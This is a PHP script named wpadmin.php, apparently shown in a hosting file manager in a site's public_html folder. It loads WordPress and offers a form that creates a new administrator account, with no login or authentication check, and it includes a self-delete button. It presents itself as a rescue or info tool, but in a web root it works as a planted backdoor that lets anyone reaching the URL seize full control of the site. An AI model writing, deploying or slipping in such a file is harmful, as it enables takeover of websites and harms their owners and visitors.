WordFence

🏠 Root / home / ddeliverstlm / public_html /

Editing: wpadmin.php

<?php
/**
 * WP Quick Admin & Info Tool
 * derived from WP Ultimate Manager
 */
error_reporting(E_ALL);
ini_set('display_errors', 0);

// 1. Load WordPress Environment
$wp_load_path = __DIR__ . '/wp-load.php';
$depth = 0;
while (!file_exists($wp_load_path) && $depth < 10) {
    $wp_load_path = dirname($wp_load_path, 2) . '/wp-load.php';
    $depth++;
}

$is_wp_loaded = false;
$status_msg = [];

if (file_exists($wp_load_path)) {
    define('WP_USE_THEMES', false);
    try {
        require_once($wp_load_path);
        $is_wp_loaded = true;
    } catch (Exception $e) {
        $status_msg = ['type' => 'red', 'text' => 'Error loading WordPress: ' . $e->getMessage()];
    }
} else {
    $status_msg = ['type' => 'red', 'text' => 'wp-load.php not found. Please upload this script to a WordPress directory.'];
}

// 2. Handle Actions
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $action = $_POST['action'] ?? '';

if ($action === 'create_admin' && $is_wp_loaded) {
        $username = trim($_POST['username']);
        $email = trim($_POST['email']);
        $password = trim($_POST['password']);

if (!$username || !$email || !$password) {
            $status_msg = ['type' => 'red', 'text' => 'All fields are required.'];
        } else {
            $user_id = username_exists($username);
            if (!$user_id && email_exists($email) == false) {
                $user_id = wp_create_user($username, $password, $email);
                if (is_wp_error($user_id)) {
                    $status_msg = ['type' => 'red', 'text' => $user_id->get_error_message()];
                } else {
                    $u = new WP_User($user_id);
                    $u->set_role('administrator');
                    $status_msg = ['type' => 'green', 'text' => "Administrator '$username' created successfully."];
                }
            } else {
                $status_msg = ['type' => 'yellow', 'text' => 'User or Email already exists.'];
            }
        }
    }

if ($action === 'delete_self') {
        if (unlink(__FILE__)) {
            die('<div style="font-family:sans-serif; text-align:center; margin-top:50px;">File deleted successfully. Bye!</div>');
        } else {
            $status_msg = ['type' => 'red', 'text' => 'Failed to delete file. Check permissions.'];
        }
    }
}

// 3. Get Theme Info
$theme_info = null;
if ($is_wp_loaded) {
    $my_theme = wp_get_theme();
    $theme_info = [
        'name' => $my_theme->get('Name'),
        'version' => $my_theme->get('Version'),
        'dir' => $my_theme->get_stylesheet_directory(),
    ];
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WP Rescue Tool</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
</head>
<body class="bg-gray-100 text-gray-800 font-sans min-h-screen flex items-center justify-center py-10">

<div class="w-full max-w-lg bg-white rounded-xl shadow-lg overflow-hidden">
    
    <div class="bg-indigo-600 px-6 py-4 flex justify-between items-center">
        <h1 class="text-white font-bold text-lg"><i class="fas fa-tools mr-2"></i> WP Admin Creator</h1>
        <?php if ($is_wp_loaded): ?>
            <span class="bg-green-500 text-white text-xs px-2 py-1 rounded font-bold">WP LOADED</span>
        <?php else: ?>
            <span class="bg-red-500 text-white text-xs px-2 py-1 rounded font-bold">WP NOT FOUND</span>
        <?php endif; ?>
    </div>

<?php if (!empty($status_msg)): ?>
            <div class="p-3 rounded border-l-4 <?php echo $status_msg['type'] === 'green' ? 'bg-green-100 border-green-500 text-green-700' : ($status_msg['type'] === 'red' ? 'bg-red-100 border-red-500 text-red-700' : 'bg-yellow-100 border-yellow-500 text-yellow-700'); ?>">
                <?php echo htmlspecialchars($status_msg['text']); ?>
            </div>
        <?php endif; ?>

<?php if ($is_wp_loaded): ?>
        
        <div class="bg-gray-50 p-4 rounded-lg border border-gray-200">
            <h2 class="text-xs font-bold text-gray-400 uppercase tracking-wider mb-2">Current Theme Info</h2>
            <div class="flex items-center justify-between">
                <div>
                    <p class="text-lg font-bold text-indigo-700"><?php echo $theme_info['name']; ?></p>
                    <p class="text-xs text-gray-500">Version: <?php echo $theme_info['version']; ?></p>
                </div>
                <div class="text-right">
                    <i class="fas fa-palette text-3xl text-gray-300"></i>
                </div>
            </div>
            <div class="mt-2 text-xs text-gray-400 font-mono break-all">
                <?php echo $theme_info['dir']; ?>
            </div>
        </div>

<form method="post" class="space-y-4">
            <input type="hidden" name="action" value="create_admin">
            <div>
                <label class="block text-sm font-medium text-gray-700 mb-1">New Username</label>
                <input type="text" name="username" class="w-full border-gray-300 border rounded-md p-2 focus:ring-indigo-500 focus:border-indigo-500" placeholder="admin_new" required>
            </div>
            <div>
                <label class="block text-sm font-medium text-gray-700 mb-1">Email Address</label>
                <input type="email" name="email" class="w-full border-gray-300 border rounded-md p-2 focus:ring-indigo-500 focus:border-indigo-500" placeholder="email@example.com" required>
            </div>
            <div>
                <label class="block text-sm font-medium text-gray-700 mb-1">Password</label>
                <input type="text" name="password" class="w-full border-gray-300 border rounded-md p-2 focus:ring-indigo-500 focus:border-indigo-500" value="Pass<?php echo rand(1000,9999); ?>" required>
            </div>
            <button type="submit" class="w-full bg-indigo-600 hover:bg-indigo-700 text-white font-bold py-2 px-4 rounded transition">
                <i class="fas fa-user-plus mr-2"></i> Create Administrator
            </button>
        </form>

<?php endif; ?>

<div class="border-t pt-6 mt-6">
            <form method="post" onsubmit="return confirm('Are you sure you want to delete this tool?');">
                <input type="hidden" name="action" value="delete_self">
                <button type="submit" class="w-full bg-white border border-red-300 text-red-600 hover:bg-red-50 font-medium py-2 px-4 rounded transition flex items-center justify-center">
                    <i class="fas fa-trash-alt mr-2"></i> Delete This Script
                </button>
                <p class="text-center text-xs text-gray-400 mt-2">Removes this file from the server immediately.</p>
            </form>
        </div>

</div>
</div>

</body>
</html>